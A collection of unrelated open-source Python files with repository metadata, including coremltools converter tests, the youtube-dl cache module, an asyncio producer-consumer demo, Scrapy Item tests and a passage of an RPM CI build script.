input_signature=[tf.TensorSpec(shape=[3, 4, 5], dtype=tf.float32)]
)
def __call__(self, x):
return tf.nn.relu(x)
model = build_model()
concrete_func = model.__call__.get_concrete_function()
mlmodel = converter.convert(
[concrete_func], outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_graphdef_from_tf_function(self, backend):
class build_model(tf.Module):
def __init__(self):
self.dense = tf.keras.layers.Dense(256, activation="relu")
input_signature = [
tf.TensorSpec(name="input", shape=(
128, 128), dtype=tf.float32),
]
@tf.function(input_signature=input_signature)
def call(self, x):
x = self.dense(x)
return x
model = build_model()
from tensorflow.python.framework.convert_to_constants import \
convert_variables_to_constants_v2
frozen_graph_func = convert_variables_to_constants_v2(
model.call.get_concrete_function())
frozen_graph_def = frozen_graph_func.graph.as_graph_def()
mlmodel = converter.convert(frozen_graph_def, convert_to=backend[0])
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_model_metadata(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
mlmodel = converter.convert(
keras_model,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
metadata_keys = mlmodel.get_spec().description.metadata.userDefined
assert "com.github.apple.coremltools.version" in metadata_keys
assert "com.github.apple.coremltools.source" in metadata_keys
assert "tensorflow==2." in metadata_keys["com.github.apple.coremltools.source"]
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_none(self, backend):
with pytest.raises(NotImplementedError, match="Expected model format: .* .h5"):
converter.convert(None, source=frontend, convert_to=backend[0])
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_invalid_extension(self, backend):
_, invalid_filename = tempfile.mkstemp(suffix=".invalid", prefix=self.saved_model_dir)
with pytest.raises(
ValueError,
match="Input model path should be .h5/.hdf5 file or a directory, but got .*.invalid",
):
converter.convert(invalid_filename, source=frontend, convert_to=backend[0])
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_multiple_concrete_functions(self, backend):
class build_model(tf.Module):
@tf.function(
input_signature=[tf.TensorSpec(shape=[3, 4, 5], dtype=tf.float32)]
)
def __call__(self, x):
return tf.nn.relu(x)
model = build_model()
cf = model.__call__.get_concrete_function()
with pytest.raises(
NotImplementedError, match="Only a single concrete function is supported"
):
converter.convert([cf, cf, cf], source=frontend, convert_to=backend[0])
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_converter_type(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
with pytest.raises(ValueError) as e:
converter.convert(keras_model, source="invalid", convert_to=backend[0])
expected_msg = r'Unrecognized value of argument "source": .*'
e.match(expected_msg)
with pytest.raises(NotImplementedError) as e:
converter.convert(keras_model, convert_to="invalid", source=frontend)
e.match(r"Backend converter .* not implemented")
@pytest.mark.parametrize(
"backend",
backends,
)
def test_invalid_format_non_exist(self, backend):
non_exist_filename = self.model_path_h5.replace(".h5", "_non_exist.h5")
with pytest.raises(ValueError) as e:
converter.convert(non_exist_filename, source=frontend, convert_to=backend[0])
e.match(r"Input model .* does not exist")
|
e0d8146996356be68632e21671a9bca93a54dec9
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/docstrings/googleNoEmptyLineAfterSummary.py
|
bca70b915a8077246d0c0f64eed06850c1b17010
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 60
|
py
|
googleNoEmptyLineAfterSummary.py
|
def f():
"""Summary.
Returns:
Nothing:
"""
|
c03d126818dc9216a76f741d74821234063aa21f
|
b54f5fe75dbb010a18d1da30a4f030fbb257ed4a
|
/attic/win32/toga_win32/widgets/passwordinput.py
|
708a074d1e7eb3afaad11931759312f6231da60e
|
[
"BSD-3-Clause"
] |
permissive
|
beeware/toga
|
449e3f008ad89e10f8ffcc61bdac798e7e825d09
|
01b076bd6434d0bd04c04ff72ac6eb20b9e973ea
|
refs/heads/main
| 2023-08-24T11:33:53.705165
| 2023-08-24T00:06:09
| 2023-08-24T00:06:09
| 22,529,973
| 1,865
| 468
|
BSD-3-Clause
| 2023-09-14T18:46:58
| 2014-08-01T21:44:10
|
Python
|
UTF-8
|
Python
| false
| false
| 124
|
py
|
passwordinput.py
|
from .textinput import TextInput
from ..libs import *
class PasswordInput(TextInput):
control_style = ES_PASSWORD
|
45af1f444b0c96737a2507fb2645353269c5524b
|
afbae26b958b5ef20548402a65002dcc8e55b66a
|
/release/stubs/System/Web.py
|
4a7bc81caefb399cbd6ed81e6933d7bcb4e482c4
|
[
"MIT"
] |
permissive
|
gtalarico/ironpython-stubs
|
d875cb8932c7644f807dc6fde9dd513d159e4f5c
|
c7f6a6cb197e3949e40a4880a0b2a44e72d0a940
|
refs/heads/master
| 2023-07-12T01:43:47.295560
| 2022-05-23T18:12:06
| 2022-05-23T18:12:06
| 95,340,553
| 235
| 88
|
NOASSERTION
| 2023-07-05T06:36:28
| 2017-06-25T05:30:46
|
Python
|
UTF-8
|
Python
| false
| false
| 8,433
|
py
|
Web.py
|
# encoding: utf-8
# module System.Web calls itself Web
# from System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class AspNetHostingPermission(CodeAccessPermission, IPermission, ISecurityEncodable, IStackWalk, IUnrestrictedPermission):
"""
Controls access permissions in ASP.NET hosted environments. This class cannot be inherited.
AspNetHostingPermission(state: PermissionState)
AspNetHostingPermission(level: AspNetHostingPermissionLevel)
"""
def Copy(self):
"""
Copy(self: AspNetHostingPermission) -> IPermission
When implemented by a derived class, creates and returns an identical copy of the current
permission object.
Returns: A copy of the current permission object.
"""
pass
def FromXml(self, securityElement):
"""
FromXml(self: AspNetHostingPermission, securityElement: SecurityElement)
Reconstructs a permission object with a specified state from an XML encoding.
securityElement: The System.Security.SecurityElement containing the XML encoding to use to reconstruct the
permission object.
"""
pass
def Intersect(self, target):
"""
Intersect(self: AspNetHostingPermission, target: IPermission) -> IPermission
When implemented by a derived class, creates and returns a permission that is the intersection
of the current permission and the specified permission.
target: A permission to combine with the current permission. It must be of the same type as the current
permission.
Returns: An System.Security.IPermission that represents the intersection of the current permission and
the specified permission; otherwise, null if the intersection is empty.
"""
pass
def IsSubsetOf(self, target):
"""
IsSubsetOf(self: AspNetHostingPermission, target: IPermission) -> bool
Returns a value indicating whether the current permission is a subset of the specified
permission.
target: The System.Security.IPermission to combine with the current permission. It must be of the same
type as the current System.Security.IPermission.
Returns: true if the current System.Security.IPermission is a subset of the specified
System.Security.IPermission; otherwise, false.
"""
pass
def IsUnrestricted(self):
"""
IsUnrestricted(self: AspNetHostingPermission) -> bool
Returns a value indicating whether unrestricted access to the resource that is protected by the
current permission is allowed.
Returns: true if unrestricted use of the resource protected by the permission is allowed; otherwise,
false.
"""
pass
def ToXml(self):
"""
ToXml(self: AspNetHostingPermission) -> SecurityElement
Creates an XML encoding of the permission object and its current state.
Returns: A System.Security.SecurityElement containing the XML encoding of the permission object,
including any state information.
"""
pass
def Union(self, target):
"""
Union(self: AspNetHostingPermission, target: IPermission) -> IPermission
Creates a permission that is the union of the current permission and the specified permission.
target: A permission to combine with the current permission. It must be of the same type as the current
permission.
Returns: An System.Security.IPermission that represents the union of the current permission and the
specified permission.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, state: PermissionState)
__new__(cls: type, level: AspNetHostingPermissionLevel)
"""
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
Level = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the current hosting permission level for an ASP.NET application.
Get: Level(self: AspNetHostingPermission) -> AspNetHostingPermissionLevel
Set: Level(self: AspNetHostingPermission) = value
"""
class AspNetHostingPermissionAttribute(CodeAccessSecurityAttribute, _Attribute):
"""
Allows security actions for System.Web.AspNetHostingPermission to be applied to code using declarative security. This class cannot be inherited.
AspNetHostingPermissionAttribute(action: SecurityAction)
"""
def CreatePermission(self):
"""
CreatePermission(self: AspNetHostingPermissionAttribute) -> IPermission
Creates a new System.Web.AspNetHostingPermission with the permission level previously set by the
System.Web.AspNetHostingPermissionAttribute.Level property.
Returns: An System.Security.IPermission that is the new System.Web.AspNetHostingPermission.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, action):
""" __new__(cls: type, action: SecurityAction) """
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
Level = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the current hosting permission level.
Get: Level(self: AspNetHostingPermissionAttribute) -> AspNetHostingPermissionLevel
Set: Level(self: AspNetHostingPermissionAttribute) = value
"""
class AspNetHostingPermissionLevel(Enum, IComparable, IFormattable, IConvertible):
"""
Specifies the trust level that is granted to an ASP.NET Web application.
enum AspNetHostingPermissionLevel, values: High (500), Low (300), Medium (400), Minimal (200), None (100), Unrestricted (600)
"""
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): #cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): #cannot find CLR method
pass
def __gt__(self, *args): #cannot find CLR method
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): #cannot find CLR method
pass
def __lt__(self, *args): #cannot find CLR method
pass
def __ne__(self, *args): #cannot find CLR method
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
High = None
Low = None
Medium = None
Minimal = None
None = None
Unrestricted = None
value__ = None
|
a45c2777827ca550c68cf85e4ae0cab92073f51b
|
b18b01b32e67433a6e749e2aae48fb69bcfc42f9
|
/financial_time_series/tensorflow_model/serving_requests/request_random.py
|
0689caa20351c749d2b558cc44ca459857155b9f
|
[
"Apache-2.0"
] |
permissive
|
kubeflow/examples
|
f83c920cb94b32f0271103afb74b3efaaae35b41
|
40cba72b522ca6879672dca24398973c8f0ef32d
|
refs/heads/master
| 2023-09-01T20:39:26.577041
| 2023-08-05T16:51:33
| 2023-08-05T16:51:33
| 119,894,375
| 1,375
| 813
|
Apache-2.0
| 2023-08-30T14:40:56
| 2018-02-01T21:13:10
|
Jsonnet
|
UTF-8
|
Python
| false
| false
| 514
|
py
|
request_random.py
|
""" Module that sends a random request to the tf-server.
Uses numpy random array to obtain a response/prediction from the tf-server.
"""
import numpy as np
from . import request_helper #pylint: disable=relative-beyond-top-level
def send_random_request():
"""Obtain the prediction for a random request (test function for the tf-server)."""
# create random input
input_tensor = np.random.rand(1, 24).astype(np.float32)
# send request
request_helper.send_request(input_tensor)
send_random_request()
|
e6b8619c91d4e7dafd200e947cf22fe8bb0009d1
|
f167dffa2f767a0419aa82bf434852069a8baeb8
|
/lib/youtube_dl/cache.py
|
54123da0e7ea4fe8693c04227eaa6905d9dd1ae7
|
[
"MIT"
] |
permissive
|
firsttris/plugin.video.sendtokodi
|
d634490b55149adfdcb62c1af1eb77568b8da3f5
|
1095c58e2bc21de4ab6fcb67a70e4f0f04febbc3
|
refs/heads/master
| 2023-08-18T10:10:39.544848
| 2023-08-15T17:06:44
| 2023-08-15T17:06:44
| 84,665,460
| 111
| 31
|
MIT
| 2022-11-11T08:05:21
| 2017-03-11T16:53:06
|
Python
|
UTF-8
|
Python
| false
| false
| 3,763
|
py
|
cache.py
|
from __future__ import unicode_literals
import errno
import json
import os
import re
import shutil
import traceback
from .compat import (
compat_getenv,
compat_open as open,
)
from .utils import (
error_to_compat_str,
expand_path,
is_outdated_version,
try_get,
write_json_file,
)
from .version import __version__
class Cache(object):
_YTDL_DIR = 'youtube-dl'
_VERSION_KEY = _YTDL_DIR + '_version'
_DEFAULT_VERSION = '2021.12.17'
def __init__(self, ydl):
self._ydl = ydl
def _get_root_dir(self):
res = self._ydl.params.get('cachedir')
if res is None:
cache_root = compat_getenv('XDG_CACHE_HOME', '~/.cache')
res = os.path.join(cache_root, self._YTDL_DIR)
return expand_path(res)
def _get_cache_fn(self, section, key, dtype):
assert re.match(r'^[a-zA-Z0-9_.-]+$', section), \
'invalid section %r' % section
assert re.match(r'^[a-zA-Z0-9_.-]+$', key), 'invalid key %r' % key
return os.path.join(
self._get_root_dir(), section, '%s.%s' % (key, dtype))
@property
def enabled(self):
return self._ydl.params.get('cachedir') is not False
def store(self, section, key, data, dtype='json'):
assert dtype in ('json',)
if not self.enabled:
return
fn = self._get_cache_fn(section, key, dtype)
try:
try:
os.makedirs(os.path.dirname(fn))
except OSError as ose:
if ose.errno != errno.EEXIST:
raise
write_json_file({self._VERSION_KEY: __version__, 'data': data}, fn)
except Exception:
tb = traceback.format_exc()
self._ydl.report_warning(
'Writing cache to %r failed: %s' % (fn, tb))
def _validate(self, data, min_ver):
version = try_get(data, lambda x: x[self._VERSION_KEY])
if not version: # Backward compatibility
data, version = {'data': data}, self._DEFAULT_VERSION
if not is_outdated_version(version, min_ver or '0', assume_new=False):
return data['data']
self._ydl.to_screen(
'Discarding old cache from version {version} (needs {min_ver})'.format(**locals()))
def load(self, section, key, dtype='json', default=None, min_ver=None):
assert dtype in ('json',)
if not self.enabled:
return default
cache_fn = self._get_cache_fn(section, key, dtype)
try:
try:
with open(cache_fn, 'r', encoding='utf-8') as cachef:
return self._validate(json.load(cachef), min_ver)
except ValueError:
try:
file_size = os.path.getsize(cache_fn)
except (OSError, IOError) as oe:
file_size = error_to_compat_str(oe)
self._ydl.report_warning(
'Cache retrieval from %s failed (%s)' % (cache_fn, file_size))
except IOError:
pass # No cache available
return default
def remove(self):
if not self.enabled:
self._ydl.to_screen('Cache is disabled (Did you combine --no-cache-dir and --rm-cache-dir?)')
return
cachedir = self._get_root_dir()
if not any((term in cachedir) for term in ('cache', 'tmp')):
raise Exception('Not removing directory %s - this does not look like a cache dir' % cachedir)
self._ydl.to_screen(
'Removing cache dir %s .' % cachedir, skip_eol=True)
if os.path.exists(cachedir):
self._ydl.to_screen('.', skip_eol=True)
shutil.rmtree(cachedir)
self._ydl.to_screen('.')
|
8cc91793e7da2f10d689924453848cd3f917d0d8
|
529e713a78e82de2ae5d44cfb8ef209e0894d72a
|
/asyncio-walkthrough/asyncq.py
|
debf5a3a809e3a731acd3617b5f1b0cebee5d154
|
[
"MIT"
] |
permissive
|
realpython/materials
|
cd2f548276be2c82f134ca03eadb1cd279e0f26e
|
d2d62756d3854f54a12a767f2bf9470486c0ceef
|
refs/heads/master
| 2023-09-05T22:12:29.806738
| 2023-08-31T20:56:28
| 2023-08-31T20:56:28
| 132,374,697
| 4,678
| 6,482
|
MIT
| 2023-09-12T22:22:06
| 2018-05-06T20:46:18
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,899
|
py
|
asyncq.py
|
#!/usr/bin/env python3
# asyncq.py
import asyncio
import itertools as it
import os
import random
import time
async def makeitem(size: int = 5) -> str:
return os.urandom(size).hex()
async def seconds() -> float:
return time.perf_counter()
async def randint(a: int, b: int) -> int:
return random.randint(a, b)
async def randsleep(a: int = 1, b: int = 5, caller=None) -> None:
i = await randint(a, b)
if caller:
print(f"{caller} sleeping for {i} seconds.")
await asyncio.sleep(i)
async def produce(name: int, q: asyncio.Queue) -> None:
n = await randint(1, 5)
for _ in it.repeat(None, n): # Synchronous
await randsleep(caller=f"Producer {name}")
i = await makeitem()
t = await seconds()
await q.put((i, t))
print(f"Producer {name} added <{i}> to queue.")
async def consume(name: int, q: asyncio.Queue) -> None:
while True:
await randsleep(caller=f"Consumer {name}")
i, t = await q.get()
now = await seconds()
print(
f"Consumer {name} got element <{i}>" f" in {now-t:0.5f} seconds."
)
q.task_done()
async def main(nprod: int, ncon: int):
q = asyncio.Queue()
producers = [asyncio.create_task(produce(n, q)) for n in range(nprod)]
consumers = [asyncio.create_task(consume(n, q)) for n in range(ncon)]
await asyncio.gather(*producers)
await q.join()
for c in consumers:
c.cancel()
if __name__ == "__main__":
import argparse
random.seed(444)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--nprod", type=int, default=5)
parser.add_argument("-c", "--ncon", type=int, default=10)
ns = parser.parse_args()
start = time.perf_counter()
asyncio.run(main(**ns.__dict__))
elapsed = time.perf_counter() - start
print(f"Program completed in {elapsed:0.5f} seconds.")
|
2c926b29d6c880bb898ee7adad8cf4bd365f4569
|
f4f704f309849a8e476bfeffa68b17ac228df04d
|
/documentation/test_python/inspect_underscored/inspect_underscored/__init__.py
|
f7e3e269911edb99e14e0845002f613fe855e54b
|
[
"MIT"
] |
permissive
|
mosra/m.css
|
3d0c3c2f7b93039eb529e154e59ff8d91d45e88d
|
c34e8608973548c5e3d31d65cbfdd5b2fc42a59e
|
refs/heads/master
| 2023-08-17T09:48:14.652793
| 2023-08-09T15:34:09
| 2023-08-09T15:34:09
| 95,897,280
| 414
| 118
|
MIT
| 2022-10-03T03:52:50
| 2017-06-30T14:42:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,142
|
py
|
__init__.py
|
"""..
:data _DATA_IN_MODULE: In-module documented underscored data. This won't be
picked up by the initial crawl, unfortunately, as the docstrings are
processed much later.
"""
import enum
from . import _submodule, _submodule_external, _submodule_undocumented
class _Class:
"""Documented underscored class"""
class _ClassExternal: pass
class _ClassUndocumented: pass
class _Enum(enum.Enum):
"""Documented underscored enum"""
class _EnumExternal(enum.Enum): pass
class _EnumUndocumented(enum.Enum): pass
def _function():
"""Documented undercored function"""
def _function_external(): pass
def _function_undocumented(): pass
_DATA_IN_MODULE: int = 0
_DATA_EXTERNAL: int = 1
_DATA_EXTERNAL_IN_MODULE: int = 2
_DATA_UNDOCUMENTED: int = 3
class Class:
"""..
:property _property_in_class: In-class documented underscored property.
This won't be picked up by the initial crawl, unfortunately, as the
docstrings are processed much later.
:data _DATA_IN_CLASS: In-class documented underscored data. This won't be
picked up by the initial crawl, unfortunately, as the docstrings are
processed much later.
:data _DATA_DECLARATION_IN_CLASS: In-class documented underscored data.
This won't be picked up by the initial crawl, unfortunately, as the
docstrings are processed much later.
"""
def _function(self):
"""Documented underscored function"""
def _function_external(self): pass
def _function_undocumented(self): pass
@property
def _property(self):
"""Documented underscored property"""
@property
def _property_in_class(self): pass
@property
def _property_external(self): pass
@property
def _property_external_in_class(self): pass
@property
def _property_undocumented(self): pass
_DATA_IN_CLASS: int = 4
_DATA_EXTERNAL: int = 5
_DATA_EXTERNAL_IN_CLASS: int = 6
_DATA_UNDOCUMENTED: int = 7
_DATA_DECLARATION_IN_CLASS: float
_DATA_DECLARATION_EXTERNAL: float
_DATA_DECLARATION_EXTERNAL_IN_CLASS: float
_DATA_DECLARATION_UNDOCUMENTED: float
|
a74b9becad438da165acdbed29a97de75204b7db
|
3ee5bf329a2e58eb9f775ec5ee6a329fd3541e36
|
/tests/test_item.py
|
ce2b4fd15e275b676314bd9ae5a426a40aba978f
|
[
"BSD-3-Clause"
] |
permissive
|
scrapy/scrapy
|
53bd79e500e2cb7441d33bfd61ba003962d5fb46
|
cddb8c15d66831dc4e1bc4b745fcc6c534bb03dc
|
refs/heads/master
| 2023-08-31T04:08:06.193342
| 2023-08-30T18:29:54
| 2023-08-30T18:29:54
| 529,502
| 47,472
| 12,120
|
BSD-3-Clause
| 2023-09-14T12:08:07
| 2010-02-22T02:01:14
|
Python
|
UTF-8
|
Python
| false
| false
| 8,991
|
py
|
test_item.py
|
import unittest
from unittest import mock
from scrapy.item import ABCMeta, Field, Item, ItemMeta
class ItemTest(unittest.TestCase):
def assertSortedEqual(self, first, second, msg=None):
return self.assertEqual(sorted(first), sorted(second), msg)
def test_simple(self):
class TestItem(Item):
name = Field()
i = TestItem()
i["name"] = "name"
self.assertEqual(i["name"], "name")
def test_init(self):
class TestItem(Item):
name = Field()
i = TestItem()
self.assertRaises(KeyError, i.__getitem__, "name")
i2 = TestItem(name="john doe")
self.assertEqual(i2["name"], "john doe")
i3 = TestItem({"name": "john doe"})
self.assertEqual(i3["name"], "john doe")
i4 = TestItem(i3)
self.assertEqual(i4["name"], "john doe")
self.assertRaises(KeyError, TestItem, {"name": "john doe", "other": "foo"})
def test_invalid_field(self):
class TestItem(Item):
pass
i = TestItem()
self.assertRaises(KeyError, i.__setitem__, "field", "text")
self.assertRaises(KeyError, i.__getitem__, "field")
def test_repr(self):
class TestItem(Item):
name = Field()
number = Field()
i = TestItem()
i["name"] = "John Doe"
i["number"] = 123
itemrepr = repr(i)
self.assertEqual(itemrepr, "{'name': 'John Doe', 'number': 123}")
i2 = eval(itemrepr)
self.assertEqual(i2["name"], "John Doe")
self.assertEqual(i2["number"], 123)
def test_private_attr(self):
class TestItem(Item):
name = Field()
i = TestItem()
i._private = "test"
self.assertEqual(i._private, "test")
def test_raise_getattr(self):
class TestItem(Item):
name = Field()
i = TestItem()
self.assertRaises(AttributeError, getattr, i, "name")
def test_raise_setattr(self):
class TestItem(Item):
name = Field()
i = TestItem()
self.assertRaises(AttributeError, setattr, i, "name", "john")
def test_custom_methods(self):
class TestItem(Item):
name = Field()
def get_name(self):
return self["name"]
def change_name(self, name):
self["name"] = name
i = TestItem()
self.assertRaises(KeyError, i.get_name)
i["name"] = "lala"
self.assertEqual(i.get_name(), "lala")
i.change_name("other")
self.assertEqual(i.get_name(), "other")
def test_metaclass(self):
class TestItem(Item):
name = Field()
keys = Field()
values = Field()
i = TestItem()
i["name"] = "John"
self.assertEqual(list(i.keys()), ["name"])
self.assertEqual(list(i.values()), ["John"])
i["keys"] = "Keys"
i["values"] = "Values"
self.assertSortedEqual(list(i.keys()), ["keys", "values", "name"])
self.assertSortedEqual(list(i.values()), ["Keys", "Values", "John"])
def test_metaclass_with_fields_attribute(self):
class TestItem(Item):
fields = {"new": Field(default="X")}
item = TestItem(new="New")
self.assertSortedEqual(list(item.keys()), ["new"])
self.assertSortedEqual(list(item.values()), ["New"])
def test_metaclass_inheritance(self):
class ParentItem(Item):
name = Field()
keys = Field()
values = Field()
class TestItem(ParentItem):
keys = Field()
i = TestItem()
i["keys"] = 3
self.assertEqual(list(i.keys()), ["keys"])
self.assertEqual(list(i.values()), [3])
def test_metaclass_multiple_inheritance_simple(self):
class A(Item):
fields = {"load": Field(default="A")}
save = Field(default="A")
class B(A):
pass
class C(Item):
fields = {"load": Field(default="C")}
save = Field(default="C")
class D(B, C):
pass
item = D(save="X", load="Y")
self.assertEqual(item["save"], "X")
self.assertEqual(item["load"], "Y")
self.assertEqual(D.fields, {"load": {"default": "A"}, "save": {"default": "A"}})
# D class inverted
class E(C, B):
pass
self.assertEqual(E(save="X")["save"], "X")
self.assertEqual(E(load="X")["load"], "X")
self.assertEqual(E.fields, {"load": {"default": "C"}, "save": {"default": "C"}})
def test_metaclass_multiple_inheritance_diamond(self):
class A(Item):
fields = {"update": Field(default="A")}
save = Field(default="A")
load = Field(default="A")
class B(A):
pass
class C(A):
fields = {"update": Field(default="C")}
save = Field(default="C")
class D(B, C):
fields = {"update": Field(default="D")}
load = Field(default="D")
self.assertEqual(D(save="X")["save"], "X")
self.assertEqual(D(load="X")["load"], "X")
self.assertEqual(
D.fields,
{
"save": {"default": "C"},
"load": {"default": "D"},
"update": {"default": "D"},
},
)
# D class inverted
class E(C, B):
load = Field(default="E")
self.assertEqual(E(save="X")["save"], "X")
self.assertEqual(E(load="X")["load"], "X")
self.assertEqual(
E.fields,
{
"save": {"default": "C"},
"load": {"default": "E"},
"update": {"default": "C"},
},
)
def test_metaclass_multiple_inheritance_without_metaclass(self):
class A(Item):
fields = {"load": Field(default="A")}
save = Field(default="A")
class B(A):
pass
class C:
fields = {"load": Field(default="C")}
not_allowed = Field(default="not_allowed")
save = Field(default="C")
class D(B, C):
pass
self.assertRaises(KeyError, D, not_allowed="value")
self.assertEqual(D(save="X")["save"], "X")
self.assertEqual(D.fields, {"save": {"default": "A"}, "load": {"default": "A"}})
# D class inverted
class E(C, B):
pass
self.assertRaises(KeyError, E, not_allowed="value")
self.assertEqual(E(save="X")["save"], "X")
self.assertEqual(E.fields, {"save": {"default": "A"}, "load": {"default": "A"}})
def test_to_dict(self):
class TestItem(Item):
name = Field()
i = TestItem()
i["name"] = "John"
self.assertEqual(dict(i), {"name": "John"})
def test_copy(self):
class TestItem(Item):
name = Field()
item = TestItem({"name": "lower"})
copied_item = item.copy()
self.assertNotEqual(id(item), id(copied_item))
copied_item["name"] = copied_item["name"].upper()
self.assertNotEqual(item["name"], copied_item["name"])
def test_deepcopy(self):
class TestItem(Item):
tags = Field()
item = TestItem({"tags": ["tag1"]})
copied_item = item.deepcopy()
item["tags"].append("tag2")
assert item["tags"] != copied_item["tags"]
class ItemMetaTest(unittest.TestCase):
def test_new_method_propagates_classcell(self):
new_mock = mock.Mock(side_effect=ABCMeta.__new__)
base = ItemMeta.__bases__[0]
with mock.patch.object(base, "__new__", new_mock):
class MyItem(Item):
def f(self):
# For rationale of this see:
# https://github.com/python/cpython/blob/ee1a81b77444c6715cbe610e951c655b6adab88b/Lib/test/test_super.py#L222
return (
__class__ # noqa https://github.com/scrapy/scrapy/issues/2836
)
MyItem()
(first_call, second_call) = new_mock.call_args_list[-2:]
mcs, class_name, bases, attrs = first_call[0]
assert "__classcell__" not in attrs
mcs, class_name, bases, attrs = second_call[0]
assert "__classcell__" in attrs
class ItemMetaClassCellRegression(unittest.TestCase):
def test_item_meta_classcell_regression(self):
class MyItem(Item, metaclass=ItemMeta):
def __init__(self, *args, **kwargs):
# This call to super() trigger the __classcell__ propagation
# requirement. When not done properly raises an error:
# TypeError: __class__ set to <class '__main__.MyItem'>
# defining 'MyItem' as <class '__main__.MyItem'>
super().__init__(*args, **kwargs)
if __name__ == "__main__":
unittest.main()
|
f89e9d58c9807d88c3c1a77118f714d3685dfd93
|
8c8a073459dcd834cebac51a2c6ad3a3c0f59fcd
|
/repos/cibuild.py
|
10cf8d84c983b4f77ec8601d0e92615640ab0011
|
[] |
no_license
|
FZUG/repo
|
a8789d57f94462d3df4e86a73005405314692989
|
b2474d8aa6f8f4404921f73a47bed77b54a6ec3f
|
refs/heads/master
| 2023-08-11T01:07:46.099837
| 2022-03-13T16:08:41
| 2022-03-16T14:12:59
| 34,797,461
| 707
| 176
| null | 2022-03-25T22:46:35
| 2015-04-29T14:09:28
|
DIGITAL Command Language
|
UTF-8
|
Python
| false
| false
| 20,954
|
py
|
cibuild.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Author: mosquito
# Email: sensor.wen@gmail.com
# Description: CI build for repo
from subprocess import getoutput, getstatusoutput, call
from urllib.request import urlretrieve
from operator import itemgetter
import urllib.error
import re
import os
import sys
import rpm
import dnf
import json
import shutil
import fnmatch
import argparse
import requests
srcDir = os.path.join(os.getcwd(), 'build')
outDir = os.path.join(os.getcwd(), 'output')
def get_commit_list():
'''Get all of commit.
Returns:
Return all of commit list.
'''
commit_list = getoutput('/bin/git rev-list -n100 --abbrev-commit HEAD').split()
commit = getoutput('/bin/git rev-parse --short HEAD~')
if os.getenv('GIT_PREVIOUS_COMMIT'):
commit = os.getenv('GIT_PREVIOUS_COMMIT')[0:7]
if os.getenv('ghprbActualCommit'):
commit_list = commit_list[1:]
code = call(['/bin/git', 'fetch', '-q'])
master_commit_list = getoutput('/bin/git rev-list -n100 --abbrev-commit origin/master').split()
inter_list = list(set(master_commit_list).intersection(set(commit_list)))
inter_list.sort(key=commit_list.index)
commit = inter_list[0]
commit_list = commit_list[0:commit_list.index(commit)]
commit_list.reverse()
return commit_list
def get_file_list(commit):
'''Get modified files for commit.
Args:
commit: commit string.
Returns:
Return list that modified files for commit.
'''
stdout = getoutput('/bin/git show --pretty="%h: %s" --name-status {}'.format(commit))
return list(filter(black_item, re.findall('rpms.*', stdout)))
def black_item(item):
'''Fliter blacklist entry.
Args:
item: A string of item.
'''
for black in blackList:
if re.match('.*' + black + '.*', item):
echo('green', 'info:', ' Filter {} file.'.format(item))
return False
return True
def query_package(query):
'''Query package name from remote repository.
Args:
query: A string of query.
Returns:
Return the list contains the RPM metadata. If the RPM is not found,
it returns empty list.
'''
if 'repos' not in globals().keys():
echo('green', 'info:', ' Initial metadata for repository.')
global repos
repos = dnf.Base()
repos.read_all_repos()
repos.fill_sack(load_available_repos=True)
return list(repos.provides(query))
def parse_spec(specFile, cacheFile='.repocache.json'):
'''Parse the Spec file contents.
Args:
specFile: A string of spec file path.
Returns:
Return the list contains the Spec file name and content. If the file
is not found, it returns false.
'''
if os.path.exists(cacheFile):
if 'repocache' not in globals().keys():
